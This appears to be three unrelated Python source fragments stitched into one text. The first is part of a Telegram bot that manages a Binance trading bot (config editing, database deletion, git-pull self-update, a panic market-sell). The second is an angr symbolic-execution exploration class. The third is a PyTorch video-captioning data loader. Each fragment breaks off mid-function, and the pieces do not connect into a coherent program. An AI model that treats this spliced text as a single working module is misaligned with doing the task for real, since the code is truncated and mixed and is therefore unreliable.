reply_text_escape_fun(
buttons.read_log(),
reply_markup=reply_markup_config,
parse_mode="MarkdownV2",
)
elif update.message.text == i18n_format("keyboard.delete_db"):
message, status = buttons.delete_db()
if status:
kb = [[i18n_format("keyboard.confirm"), i18n_format("keyboard.go_back")]]
reply_text_escape_fun(
message,
reply_markup=ReplyKeyboardMarkup(kb, resize_keyboard=True),
parse_mode="MarkdownV2",
)
return DELETE_DB
else:
reply_text_escape_fun(
message, reply_markup=reply_markup_config, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.edit_cfg"):
message, status = buttons.edit_user_cfg()
if status:
reply_text_escape_fun(
message, reply_markup=ReplyKeyboardRemove(), parse_mode="MarkdownV2"
)
return EDIT_USER_CONFIG
else:
reply_text_escape_fun(
message, reply_markup=reply_markup_config, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.edit_coin_list"):
message, status = buttons.edit_coin()
if status:
reply_text_escape_fun(
message, reply_markup=ReplyKeyboardRemove(), parse_mode="MarkdownV2"
)
return EDIT_COIN_LIST
else:
reply_text_escape_fun(
message, reply_markup=reply_markup_config, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.export_db"):
message, document = buttons.export_db()
reply_text_escape_fun(
message, reply_markup=reply_markup_config, parse_mode="MarkdownV2"
)
if document is not None:
settings.CHAT.send_document(
document=document,
filename="crypto_trading.db",
)
elif update.message.text == i18n_format("keyboard.update_tgb"):
message, status = buttons.update_tg_bot()
if status:
kb = [
[i18n_format("keyboard.update"), i18n_format("keyboard.cancel_update")]
]
reply_text_escape_fun(
message,
reply_markup=ReplyKeyboardMarkup(kb, resize_keyboard=True),
parse_mode="MarkdownV2",
)
return UPDATE_TG
else:
reply_text_escape_fun(
message,
reply_markup=reply_markup_maintenance,
parse_mode="MarkdownV2",
)
elif update.message.text == i18n_format("keyboard.update_btb"):
message, status = buttons.update_btb()
if status:
kb = [
[i18n_format("keyboard.update"), i18n_format("keyboard.cancel_update")]
]
reply_text_escape_fun(
message,
reply_markup=ReplyKeyboardMarkup(kb, resize_keyboard=True),
parse_mode="MarkdownV2",
)
return UPDATE_BTB
else:
reply_text_escape_fun(
message,
reply_markup=reply_markup_maintenance,
parse_mode="MarkdownV2",
)
elif update.message.text == i18n_format("keyboard.execute_script"):
kb, status, message = get_custom_scripts_keyboard()
if status:
reply_text_escape_fun(
message,
reply_markup=ReplyKeyboardMarkup(kb, resize_keyboard=True),
parse_mode="MarkdownV2",
)
return CUSTOM_SCRIPT
else:
reply_text_escape_fun(
message,
reply_markup=reply_markup_maintenance,
parse_mode="MarkdownV2",
)
return MENU
def edit_coin(update: Update, _: CallbackContext) -> int:
logger.info(f"Editing coin list. ({update.message.text})")
# modify reply_text function to have it escaping characters
reply_text_escape_fun = reply_text_escape(update.message.reply_text)
if update.message.text != "/stop":
message = (
f"{i18n_format('coin_list.success')}\n\n"
f"```\n"
f"{update.message.text}\n"
f"```"
)
coin_file_path = os.path.join(settings.ROOT_PATH, "supported_coin_list")
try:
shutil.copyfile(coin_file_path, f"{coin_file_path}.backup")
with open(coin_file_path, "w") as f:
f.write(update.message.text + "\n")
except Exception as e:
logger.error(f"❌ Unable to edit coin list file: {e}", exc_info=True)
message = i18n_format("coin_list.error")
else:
message = (
f"{i18n_format('exited_no_change')}\n"
f"{i18n_format('coin_list.not_modified')}"
)
keyboard = [[i18n_format("keyboard.go_back")]]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
reply_text_escape_fun(message, reply_markup=reply_markup, parse_mode="MarkdownV2")
return MENU
def edit_user_config(update: Update, _: CallbackContext) -> int:
logger.info(f"Editing user configuration. ({update.message.text})")
# modify reply_text function to have it escaping characters
reply_text_escape_fun = reply_text_escape(update.message.reply_text)
if update.message.text != "/stop":
message = (
f"{i18n_format('config.success')}\n\n"
f"```\n"
f"{update.message.text}\n"
f"```"
)
user_cfg_file_path = os.path.join(settings.ROOT_PATH, "user.cfg")
try:
shutil.copyfile(user_cfg_file_path, f"{user_cfg_file_path}.backup")
with open(user_cfg_file_path, "w") as f:
f.write(update.message.text + "\n\n\n")
except Exception as e:
logger.error(
f"❌ Unable to edit user configuration file: {e}", exc_info=True
)
message = i18n_format("config.error")
try:
shutil.copymode(user_cfg_file_path, f"{user_cfg_file_path}.backup")
except:
pass
else:
message = (
f"{i18n_format('exited_no_change')}\n"
f"{i18n_format('config.not_modified')}"
)
keyboard = [[i18n_format("keyboard.go_back")]]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
reply_text_escape_fun(message, reply_markup=reply_markup, parse_mode="MarkdownV2")
return MENU
def delete_db(update: Update, _: CallbackContext) -> int:
logger.info(
f"Asking if the user really wants to delete the db. ({update.message.text})"
)
# modify reply_text function to have it escaping characters
reply_text_escape_fun = reply_text_escape(update.message.reply_text)
if update.message.text != i18n_format("keyboard.go_back"):
message = i18n_format("db.delete.success")
db_file_path = os.path.join(settings.ROOT_PATH, "data/crypto_trading.db")
pw_file_path = os.path.join(settings.ROOT_PATH, "data/paper_wallet.json")
log_file_path = os.path.join(settings.ROOT_PATH, "logs/crypto_trading.log")
try:
shutil.copyfile(db_file_path, f"{db_file_path}.backup")
os.remove(db_file_path)
if os.path.isfile(pw_file_path):
shutil.copyfile(pw_file_path, f"{pw_file_path}.backup")
os.remove(pw_file_path)
except Exception as e:
logger.error(f"❌ Unable to delete database file: {e}", exc_info=True)
message = i18n_format("db.delete.error")
try:
with open(log_file_path, "w") as f:
f.truncate()
except Exception as e:
logger.error(f"❌ Unable to clear log file: {e}", exc_info=True)
message = i18n_format("db.delete.clear_log_error")
else:
message = (
f"{i18n_format('exited_no_change')}\n"
f"{i18n_format('db.delete.not_deleted')}"
)
keyboard = [[i18n_format("keyboard.ok")]]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
reply_text_escape_fun(message, reply_markup=reply_markup, parse_mode="MarkdownV2")
return MENU
def update_tg_bot(update: Update, _: CallbackContext) -> int:
logger.info(f"Updating BTB Manager Telegram. ({update.message.text})")
# modify reply_text function to have it escaping characters
reply_text_escape_fun = reply_text_escape(update.message.reply_text)
if update.message.text != i18n_format("keyboard.cancel_update"):
message = i18n_format("update.tgb.updating")
keyboard = [["/start"]]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
reply_text_escape_fun(
message, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
try:
manager_python_path = sys.executable
subprocess.call(
f"git pull && {manager_python_path} -m pip install -r requirements.txt --upgrade && "
f"{manager_python_path} -m btb_manager_telegram {settings.RAW_ARGS} &",
shell=True,
)
kill_btb_manager_telegram_process()
except Exception as e:
logger.error(f"❌ Unable to update BTB Manager Telegram: {e}", exc_info=True)
message = i18n_format("update.tgb.error")
reply_text_escape_fun(
message, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
else:
message = (
f"{i18n_format('exited_no_change')}\n"
f"{i18n_format('update.tgb.not_updated')}"
)
keyboard = [[i18n_format("keyboard.ok_s")]]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
reply_text_escape_fun(
message, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
return MENU
def update_btb(update: Update, _: CallbackContext) -> int:
logger.info(f"Updating Binance Trade Bot. ({update.message.text})")
# modify reply_text function to have it escaping characters
reply_text_escape_fun = reply_text_escape(update.message.reply_text)
keyboard = [[i18n_format("keyboard.ok_s")]]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
if update.message.text != i18n_format("keyboard.cancel_update"):
message = (
f"{i18n_format('update.btb.updating')}\n"
f"{i18n_format('update.btb.start_manually')}"
)
reply_text_escape_fun(
message, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
try:
find_and_kill_binance_trade_bot_process()
subprocess.call(
f"cd {settings.ROOT_PATH} && "
f"git pull && "
f"{settings.PYTHON_PATH} -m pip install -r requirements.txt --upgrade",
shell=True,
)
settings.BTB_UPDATE_BROADCASTED_BEFORE = False
except Exception as e:
logger.error(f"Unable to update Binance Trade Bot: {e}", exc_info=True)
message = "Unable to update Binance Trade Bot"
reply_text_escape_fun(
message, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
else:
message = (
f"{i18n_format('exited_no_change')}\n"
f"{i18n_format('update.btb.not_updated')}"
)
reply_text_escape_fun(
message, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
return MENU
def panic(update: Update, _: CallbackContext) -> int:
logger.info(f"Panic Button is doing its job. ({update.message.text})")
# modify reply_text function to have it escaping characters
reply_text_escape_fun = reply_text_escape(update.message.reply_text)
keyboard = [[i18n_format("keyboard.great")]]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
if update.message.text != i18n_format("keyboard.go_back"):
find_and_kill_binance_trade_bot_process()
# Get current coin pair
db_file_path = os.path.join(settings.ROOT_PATH, "data/crypto_trading.db")
con = sqlite3.connect(db_file_path)
cur = con.cursor()
# Get last trade
cur.execute(
"""SELECT alt_coin_id, crypto_coin_id FROM trade_history ORDER BY datetime DESC LIMIT 1;"""
)
alt_coin_id, crypto_coin_id = cur.fetchone()
# Get Binance api keys and tld
user_cfg_file_path = os.path.join(settings.ROOT_PATH, "user.cfg")
with open(user_cfg_file_path) as cfg:
config = ConfigParser()
config.read_file(cfg)
api_key = config.get("binance_user_config", "api_key")
api_secret_key = config.get("binance_user_config", "api_secret_key")
tld = config.get("binance_user_config", "tld")
if update.message.text != i18n_format("keyboard.stop_sell"):
params = {
"symbol": f"{alt_coin_id}{crypto_coin_id}",
"side": "SELL",
"type": "MARKET",
}
message = send_signed_request(
api_key,
api_secret_key,
f"https://api.binance.{tld}",
"POST",
"/api/v3/order",
payload=params,
)
if update.message.text != i18n_format("keyboard.stop_cancel"):
params = {"symbol": f"{alt_coin_id}{crypto_coin_id}"}
message = send_signed_request(
api_key,
api_secret_key,
f"https://api.binance.{tld}",
"DELETE",
"/api/v3/openOrders",
payload=params,
)
if update.message.text != i18n_format("keyboard.stop_bot"):
message = i18n_format("killed_bot")
else:
message = (
f"{i18n_format('exited_no_change')}\n"
f"{i18n_format('update.btb.not_updated')}"
)
reply_text_escape_fun(message, reply_markup=reply_markup, parse_mode="MarkdownV2")
return MENU
def execute_custom_script(update: Update, _: CallbackContext) -> int:
logger.info(f"Going to 🤖 execute custom script. ({update.message.text})")
# modify reply_text function to have it escaping characters
reply_text_escape_fun = reply_text_escape(update.message.reply_text)
keyboard = [[i18n_format("keyboard.ok_s")]]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
custom_scripts_path = "./config/custom_scripts.json"
<gh_stars>0
#!/usr/bin/env python3
import time as timer
import sys
import logging
from collections import deque
from angr.exploration_techniques import ExplorationTechnique
import psutil
class ToolChainExplorer(ExplorationTechnique):
"""
TODO
"""
def __init__(
self,
simgr,
max_length,
exp_dir,
nameFileShort,
worker
):
#TODO refactor
super(ToolChainExplorer, self).__init__()
self._max_length = max_length
self.worker = worker
self.timeout = worker.timeout
self.jump_it = worker.jump_it
self.timeout_tab = worker.timeout_tab
self.start_time = timer.time()
self.log = logging.getLogger("ToolChainExplorer")
self.log.setLevel("INFO")
self.max_end_state = worker.max_end_state
self.errored = 0
self.unconstrained = 0
self.deadended = 0
self.active = 1
self.id = 0
self.snapshot_state = {}
self.fork_stack = deque()
self.pause_stash = simgr.stashes["pause"]
self.exp_dir = exp_dir
self.nameFileShort = nameFileShort
self.eval_time = worker.eval_time
self.time_id = 0
self.print_sm_step = True
self.loopBreak_stack = deque()
self.jump_concrete_dict = worker.jump_concrete_dict
self.jump_dict = worker.jump_dict
self.jump_dict[0] = {}
self.jump_concrete_dict[0] = {}
self.loop_counter_concrete = worker.loop_counter_concrete
self.max_step = worker.max_step
self.max_simul_state = worker.max_simul_state
self.max_in_pause_stach = worker.max_in_pause_stach
self.scdg = worker.scdg
self.scdg_fin = [] # TODO from main
self.dict_addr_vis = {}
self.print_on = worker.print_on
self.print_sm_step = worker.print_sm_step
self.print_syscall = worker.print_syscall
self.debug_error = worker.debug_error
self.loopBreak_stack = deque()
self.call_sim = worker.call_sim
self.expl_method = "DFS"
self.memory_limit = worker.memory_limit
def _filter(self, s):
return True
def check_constraint(self, state, value):
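# Try to concretise the (possibly symbolic) value with the solver; if it has no unique solution, return the symbolic value unchanged.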
try:
val = state.solver.eval_one(value)
is_sao = hasattr(val, "to_claripy")
if is_sao:
val = val.to_claripy()
except Exception:
if self.print_on:
self.log.info("Symbolic value encountered !")
return value
return val
def __proper_formating(self, state, value):
"""
Take a state and a value (argument/return value) and return an appropriate representation to use in the SCDG.
"""
if hasattr(value, "to_claripy"):
value = value.to_claripy()
if hasattr(value, "symbolic") and value.symbolic and hasattr(value, "name"):
# self.log.info("case 1 formating")
return value.name
elif (
hasattr(value, "symbolic") and value.symbolic and len(value.variables) == 1
):
# import pdb; pdb.set_trace()
# self.log.info("case 2 formating")
# self.log.info(value.variables)
return list(value.variables)[0]
elif hasattr(value, "symbolic") and value.symbolic:
# self.log.info('case 3 : multiple variables involved')
# TODO improve this
ret = "_".join(list(value.variables))
return ret
else:
# self.log.info("case 4 formating")
try:
val = state.solver.eval_one(value)
return val
except:
return value
def take_smallest(self, simgr, source_stash):
"""
Take the state in source_stash with the smallest number of steps and append it to the active stash
@pre : source_stash exists
"""
id_to_move = 0
min_step = 2000
if len(simgr.stashes[source_stash]) > 0:
id_to_move = simgr.stashes[source_stash][0].globals["id"]
min_step = simgr.stashes[source_stash][0].globals["n_steps"]
else:
return
for s in simgr.stashes[source_stash]:
if s.globals["n_steps"] < min_step or (
str(self.check_constraint(s, s.history.jump_target))
not in self.dict_addr_vis
and s.globals["n_steps"] <= min_step
):
id_to_move = s.globals["id"]
min_step = s.globals["n_steps"]
simgr.move(source_stash, "active", lambda s: s.globals["id"] == id_to_move)
def take_longuest(self, simgr, source_stash):
"""
Take the state in source_stash with the largest number of steps and append it to the active stash
@pre : source_stash exists
"""
id_to_move = 0
max_step = 0
if len(simgr.stashes[source_stash]) > 0:
id_to_move = simgr.stashes[source_stash][0].globals["id"]
max_step = simgr.stashes[source_stash][0].globals["n_steps"]
else:
return
for s in simgr.stashes[source_stash]:
if s.globals["n_steps"] > max_step:
id_to_move = s.globals["id"]
max_step = s.globals["n_steps"]
simgr.move(source_stash, "active", lambda s: s.globals["id"] == id_to_move)
def __take_custom(self, simgr, source_stash, moves):
"""
Prefer a state of source_stash whose next jump target has not been visited yet and append it to the active stash; otherwise fall back to the state with the smallest number of steps.
@pre : source_stash exists
"""
id_to_move = 0
if len(simgr.stashes[source_stash]) == 0:
return
for s in simgr.stashes[source_stash]:
if (
str(self.check_constraint(s, s.history.jump_target))
not in self.dict_addr_vis
):
id_to_move = s.globals["id"]
simgr.move(
source_stash, "active", lambda s: s.globals["id"] == id_to_move
)
# self.log.info('optimization for exploration used')
return
self.take_smallest(simgr, source_stash)
def __take_custom_deep(self, simgr, source_stash):
id_to_move = 0
if len(simgr.stashes[source_stash]) == 0:
return
for s in simgr.stashes[source_stash]:
if (
str(self.check_constraint(s, s.history.jump_target))
not in self.dict_addr_vis
):
id_to_move = s.globals["id"]
simgr.move(
source_stash, "active", lambda s: s.globals["id"] == id_to_move
)
# self.log.info('optimization for exploration used')
return
self.take_longuest(simgr, source_stash)
def __change_main_state(self, simgr, source_stash):
"""
Take a state of source_stash and append it to active stash
@pre : source_stash exists
"""
if len(simgr.stashes[source_stash]) > 0:
simgr.stashes["active"].append(simgr.stashes[source_stash].pop())
def mv_bad_active(self, simgr):
"""
Take the simulation manager and discard states that:
- exceed the maximum number of steps, or
- execute a simple (concrete) loop too many times.
"""
# Discard Loop without symbolic variable which takes too much time
for state in simgr.active:
test = str(state.history.jump_target) + "-" + str(state.history.jump_source)
if test in self.jump_concrete_dict[state.globals["id"]]:
self.jump_concrete_dict[state.globals["id"]][test] += 1
else:
self.jump_concrete_dict[state.globals["id"]][test] = 1
if (
self.jump_concrete_dict[state.globals["id"]][test]
> self.loop_counter_concrete
):
# import pdb; pdb.set_trace()
# state.history.trim()
simgr.move(
from_stash="active",
to_stash="ExcessLoop",
filter_func=lambda s: s.globals["id"] == state.globals["id"],
)
self.log.info("A state has been discarded because of simple loop")
if state.globals["n_steps"] % 1000 == 0:
self.log.debug("n_steps = " + str(state.globals["n_steps"]))
if state.globals["n_steps"] > self.max_step:
# import pdb; pdb.set_trace()
state.history.trim()
simgr.move(
from_stash="active",
to_stash="ExcessStep",
filter_func=lambda s: s.globals["id"] == state.globals["id"],
)
self.log.info("A state has been discarded because of max_step reached")
def __mv_new_addr_state(self, simgr):
"""
Check new_addr stash and update it correctly
"""
for s in simgr.stashes["new_addr"]:
if (
str(self.check_constraint(s, s.history.jump_target))
in self.dict_addr_vis
):
id_to_move = s.globals["id"]
simgr.move("new_addr", "pause", lambda s: s.globals["id"] == id_to_move)
# self.log.info('optimization for exploration used')
return
def __update_id_stash(self, simgr, id, new_id):
"""
Inspect the active stash.
If two states share the same id, update one of them to new_id.
Return the states that had this initial id.
"""
found = False
was_excess = False
first_state = None
for state in simgr.active:
if state.globals["id"] == id:
# Case 1 : First state of stash could be a JumpExcedeed, second is not
if found and not state.globals["JumpExcedeed"]:
if was_excess:
state.globals["id"] = new_id
return first_state, state
return state, first_state
# Case 2 : First state of stash could not be a JumpExcedeed, second is !
elif found and state.globals["JumpExcedeed"]:
return state, first_state
# Case 3 : First state of stash IS a jumpExcedeed !
elif not found and state.globals["JumpExcedeed"]:
found = True
was_excess = True
first_state = state
# Case 4 : First state of stash IS NOT a jumpExcedeed !
else:
found = True
state.globals["id"] = new_id
first_state = state
# Was a 'fake' fork
first_state.globals["id"] = id
# Break at specific instruction and open debug mode.
def __debug_instr(self, state):
if state.inspect.instruction == int(
"0x0040123f", 16
) or state.inspect.instruction == int("0x0040126e", 16):
self.log.info("Debug function\n\n")
self.log.info(hex(state.inspect.instruction))
import pdb
pdb.set_trace()
def __debug_read(self, state):
if state.solver.eval(state.inspect.mem_read_address) == int("0xf404120", 16):
self.log.info("Read function\n\n")
self.log.info(state.inspect.mem_read_address)
import pdb
pdb.set_trace()
def __debug_write(self, state):
if state.solver.eval(state.inspect.mem_write_address) == int("0xf404120", 16):
self.log.info("Write function\n\n")
self.log.info(state.inspect.mem_write_address)
import pdb
pdb.set_trace()
def __add_addr_call(self, state):
test = state.globals["addr_call"] + [state.scratch.ins_addr]
state.globals["addr_call"] = test
def __rm_addr_call(self, state):
calls = state.globals["addr_call"]
if len(calls) > 1:
state.globals["addr_call"] = calls[1:]
def step(self, simgr, stash="active", **kwargs):
pass
def build_snapshot(self, simgr):
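# Count how many active states share each id and bump their step counters; an id seen more than once means that state forked during the last step, which is recorded on fork_stack.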
self.snapshot_state.clear()
for state in simgr.active:
if state.globals["id"] in self.snapshot_state:
self.fork_stack.append(state.globals["id"])
self.snapshot_state[state.globals["id"]] += 1
else:
self.snapshot_state[state.globals["id"]] = 1
state.globals["n_steps"] += 1
def manage_unconstrained(self, simgr):
if len(simgr.unconstrained) > self.unconstrained:
new_unconstrained = len(simgr.unconstrained) - self.unconstrained
for i in range(new_unconstrained):
id_cur = simgr.unconstrained[-1].globals["id"]
self.log.info(
"End of the trace number " + str(id_cur) + " unconstrained"
)
self.unconstrained = len(simgr.unconstrained)
def manage_error(self, simgr):
if len(simgr.errored) > self.errored:
new_errors = len(simgr.errored) - self.errored
self.log.info(simgr.errored)
for i in range(new_errors):
id_cur = simgr.errored[-i - 1].state.globals["id"]
self.log.info("End of the trace number " + str(id_cur) + " with errors")
last_error = simgr.errored[-i - 1]
if self.debug_error:
# import pdb
# pdb.set_trace()
# last_error.debug()
pass
self.errored = len(simgr.errored)
def drop_excessed_loop(self, simgr):
excess_loop = len(simgr.stashes["ExcessLoop"]) - (self.max_in_pause_stach / 5)
excess_loop = int(excess_loop) # TODO chris check how we round (up-down)
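# Keep the ExcessLoop stash at roughly one fifth of the pause-stash capacity by dropping the most recently added states beyond that.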
if excess_loop > 0:
id_to_stash = []
# print(excess_loop)
state_to_stash = simgr.stashes["ExcessLoop"][-excess_loop:]
for t in state_to_stash:
id_to_stash.append(t.globals["id"])
simgr.drop(
filter_func=lambda s: s.globals["id"] in id_to_stash, stash="ExcessLoop"
)
def excessed_step_to_active(self, simgr):
if len(simgr.active) == 0 and len(simgr.stashes["ExcessStep"]) > 0:
moves = min(len(simgr.stashes["ExcessStep"]), self.max_simul_state)
id_move = []
for i in range(moves):
state = simgr.stashes["ExcessStep"][i]
self.id = state.globals["id"]
id_move.append(self.id)
state.globals["n_steps"] = 0
simgr.move(
from_stash="ExcessStep",
to_stash="active",
filter_func=lambda s: s.globals["id"] in id_move,
)
def excessed_loop_to_active(self, simgr):
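# When nothing is active, revive up to max_simul_state states from the ExcessLoop stash and reset their jump bookkeeping so they are no longer flagged as loop-exceeded.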
if len(simgr.active) == 0 and len(simgr.stashes["ExcessLoop"]) > 0:
moves = min(len(simgr.stashes["ExcessLoop"]), self.max_simul_state)
id_move = []
for i in range(moves):
state = simgr.stashes["ExcessLoop"][i]
self.id = state.globals["id"]
id_move.append(self.id)
state.globals["JumpExcedeed"] = False
self.jump_dict[self.id].clear()
self.jump_concrete_dict[self.id].clear()
simgr.move(
from_stash="ExcessLoop",
to_stash="active",
filter_func=lambda s: s.globals["id"] in id_move,
)
def manage_pause(self, simgr):
# If too many states are explored simultaneously, move some of them to the pause stash.
if len(simgr.active) > self.max_simul_state:
excess = len(simgr.active) - self.max_simul_state
state_to_stash = simgr.active[-excess:]
id_to_stash = []
for t in state_to_stash:
id_to_stash.append(t.globals["id"])
simgr.move(
from_stash="active",
to_stash="pause",
filter_func=lambda s: s.globals["id"] in id_to_stash,
)
# If there are too many states in the pause stash, discard some
<filename>dataloader.py
# coding:utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import cPickle
import h5py
import os, time, pdb
import numpy as np
import random
import torch
import torch.utils.data as data
import multiprocessing
import pandas as pd
class DataLoader(data.Dataset):
def reset_iterator(self, split):
del self._prefetch_process[split]
self._prefetch_process[split] = BlobFetcher(split,
self, (split == 'train') and (self.opt.shuffle))
self.iterators[split] = 0
def get_vocab_size(self):
return self.vocab_size
def get_dataset_dize(self, mode):
return len(self.split_ix[mode])
def get_vocab(self):
return self.ix_to_word
def get_seq_length(self):
return self.seq_length
def get_other_feats(self, other_features):
other_feats = {'lda': None}
if 'lda' in other_features:
lda_file = h5py.File(self.opt.input_lda_path, 'r')
lda_data = {vid: lda_file[vid].value for vid in lda_file.keys()}
lda_file.close()
other_feats['lda'] = lda_data
return other_feats
def get_c3d_feature(self, video_id):
feature = np.load(os.path.join(self.input_c3d_dir2, video_id + '.npy')).astype('float32')
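# Standardise the C3D features with fixed dataset-level mean and variance statistics.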
mean = -0.001915027447565527
var = 1.9239444588254049
feature = (feature - mean) / np.sqrt(var)
att_feature = np.zeros((1, 1, 1)).astype('float32')
return feature, att_feature
def get_twostream_feature(self, video_id):
path = os.path.join(self.opt.input_twostream_dir, 'spatial', 'csv_action', video_id + '.csv')
if not os.path.exists(path):
vid_len = np.load(os.path.join(self.input_c3d_dir2, video_id + '.npy')).astype('float32').shape[0]
att_feature = np.zeros((1, 1, 1)).astype('float32')
return np.zeros((vid_len, 400)), att_feature
spatial = pd.read_csv(path)
OF = pd.read_csv(os.path.join(self.opt.input_twostream_dir, 'OF', 'csv_action', video_id + '.csv'))
if spatial.shape[0] >= OF.shape[0]:
vid_len = OF.shape[0]
else:
vid_len = spatial.shape[0]
feature = np.concatenate((spatial[:vid_len], OF[:vid_len]),1)
att_feature = np.zeros((1, 1, 1)).astype('float32')
return feature,att_feature
def get_data(self, ix):
video_id = self.info['videos'][ix]['video_id']
# feature = np.array(self.feats_c3d[video_id]['c3d_features']).astype('float32')
features, att_features = [], []
if vars(self.opt).get('use_c3d_feature',True):
feature1, att_feature1 = self.get_c3d_feature(video_id)
features.append(feature1)
att_features.append(att_feature1)
if vars(self.opt).get('use_2stream_feature',False):
feature2, att_feature2 = self.get_twostream_feature(video_id)
feature2 = feature2[::2]
att_feature2 = att_feature2[::2]
features.append(feature2)
att_features.append(att_feature2)
vid_len = 1e10
for f in features:
vid_len = f.shape[0] if f.shape[0] < vid_len else vid_len
features = [f[:vid_len] for f in features]
feature = np.concatenate(features, 1).astype('float32')
att_feature = np.concatenate(att_features, 1).astype('float32')
iou_scores, tap_masks, gts_index, gt_featstamps, tap_other = self.get_vid_data(video_id, feature.shape[0])
if self.use_SOTA_tep:
SOTA_featstamps, SOTA_Prop_score, SOTA_timestamps = self.get_SOTA_TEP_label(video_id, feature.shape[0])
else:
SOTA_featstamps = SOTA_Prop_score = SOTA_timestamps = None
w1 = np.array(self.w1).astype('float32')
tap_labels = (iou_scores >= self.opt.iou_threshold)
tap_masks_good_proposal = (iou_scores >= self.opt.iou_threshold_for_good_proposal) # * tap_masks
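# Anchors with IoU above iou_threshold become positive proposal labels; the stricter iou_threshold_for_good_proposal marks proposals treated as good matches to a ground-truth segment.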
lda_feat = np.array(self.other_feats['lda'][video_id]).astype('float32') if self.opt.use_lda else np.array(
[0])
other = {}
train_only = {}
other['gt_featstamps'] = gt_featstamps
other['SOTA_featstamps'] = SOTA_featstamps
other['SOTA_timestamps'] = SOTA_timestamps
other['SOTA_Prop_score'] = SOTA_Prop_score
# if ix < self.train_length: # if ix is in training set
if True:
tap_gts_for_good_proposal = (tap_masks_good_proposal * (gts_index + 1) - 1).astype('int')
proposal_num = (tap_gts_for_good_proposal >= 0).sum()
# assert ncap == tap_gts_for_good_proposal.max() + 1
other['tap_gts_for_good_proposal'] = tap_gts_for_good_proposal
if self.opt.tap_model == "sst_1stage" and proposal_num > 0:
tap_list, lm_list, soi_list, sampled_ids, action_label = self.get_shuffle_list(tap_gts_for_good_proposal,gt_featstamps,
method='1stage')
other['action_label'] = action_label
else:
tap_list, lm_list, soi_list, sampled_ids = self.get_shuffle_list(tap_gts_for_good_proposal,gt_featstamps,
method='random')
train_only['ind_select_list'] = np.array(tap_list[sampled_ids]).astype('int') # sampled
train_only['ind_select_list_eval'] = np.array(tap_list).astype('int') # sampled
train_only['cg_select_list'] = np.array(lm_list[sampled_ids]).astype('int') # sampled
train_only['soi_select_list'] = np.array(soi_list[sampled_ids]).astype('int') # sampled
train_only['soi_select_list_eval'] = np.array(soi_list).astype('int') # sampled
train_only['sampled_ids'] = np.array(sampled_ids).astype('int')
return [feature,
lda_feat,
att_feature,
tap_labels,
tap_masks,
iou_scores,
gts_index,
tap_masks_good_proposal,
train_only,
# tap_good_proposal_info,
w1,
ix,
other]
def __init__(self, opt):
# initial some variables
self.opt = opt
self.batch_size = self.opt.batch_size
self.use_att = getattr(opt, 'use_att', False)
self.iou_threshold = self.opt.iou_threshold
self.iou_threshold_good = self.opt.iou_threshold_for_good_proposal
# self.label_file_for_tap = self.opt.label_file_for_tap
self.input_c3d_dir2 = opt.input_c3d_dir2
with open(self.opt.w1_json) as f:
self.w1 = json.load(f)
with open(self.opt.video_json) as f:
self.data = json.load(f)
self.use_SOTA_tep = vars(self.opt).get('SOTA_json', None)
if self.use_SOTA_tep:
with open(self.opt.SOTA_json) as f:
self.SOTA_TEP_Poporal = json.load(f)['results']
self.K = self.opt.K
self.prop_sample_num = opt.prop_sample_num
# load json file which contains additional information about dataset
print('DataLoader loading features file: ', opt.input_c3d_dir2)
print('DataLoader loading train label file: ', opt.train_label_for_cg)
print('DataLoader loading val label file: ', opt.val_label_for_cg)
with open(self.opt.video_data_for_cg) as f:
self.info = json.load(f)
print('DataLoader loading video_data_information file: ', opt.video_data_for_cg)
self.ix_to_word = self.info['ix_to_word']
self.vocab_size = len(self.ix_to_word)
print('vocab size is ', self.vocab_size)
# open the label file
train_label_h5 = h5py.File(self.opt.train_label_for_cg, 'r', driver='core')
self.train_label_file = {key: train_label_h5[key].value for
key in train_label_h5.keys()}
train_label_h5.close()
val_label_h5 = h5py.File(self.opt.val_label_for_cg, 'r', )
self.val_label_file = {key: val_label_h5[key].value for key in
val_label_h5.keys()}
val_label_h5.close()
if vars(self.opt).get('other_features', 0) != 0:
self.other_feats = self.get_other_feats(self.opt.other_features)
seq_size = self.train_label_file['labels'].shape
self.seq_length = seq_size[1]
print('max sequence length in data is', self.seq_length)
# load the index of sentences for all videos
# end_ix - start_ix is the number of sentences for a video
self.train_label_start_ix = self.train_label_file['label_start_ix'][:]
self.train_label_end_ix = self.train_label_file['label_end_ix'][:]
self.val_label_start_ix = self.val_label_file['label_start_ix'][:]
self.val_label_end_ix = self.val_label_file['label_end_ix'][:]
self.val_videos = self.val_label_start_ix.shape[0]
self.train_videos = self.train_label_start_ix.shape[0]
print('there are %d videos to be trained' % (self.train_videos))
print("there are %d videos in validation " % (self.val_videos))
self.split_ix = {'train': [], 'val': [], 'test': []}
# separate out indexes for each of the provided splits
for ix in range(len(self.info['videos'])):
# if ix % 10 != 0:
# continue
video = self.info['videos'][ix]
if video['split'] == 'train':
self.split_ix['train'].append(ix)
elif video['split'] == 'val':
self.split_ix['val'].append(ix)
elif video['split'] == 'test':
self.split_ix['test'].append(ix)
elif opt.train_only == 0: # restval
self.split_ix['train'].append(ix)
print('assigned %d videos to split train' % len(self.split_ix['train']))
print('assigned %d videos to split val' % len(self.split_ix['val']))
print('assigned %d videos to split test' % len(self.split_ix['test']))
self.train_length = self.train_videos
self.val_length = self.val_videos
# self.test_length = len(self.split_ix['test'])
self.iterators = {'train': 0, 'val': 0, 'test': 0}
self._prefetch_process = {} # The three prefetch processes
for split in self.iterators.keys():
self._prefetch_process[split] = BlobFetcher(split,
self, (split == 'train') and (opt.shuffle))
# BlobFetcher(train,self,train)
# Terminate the child process when the parent exits
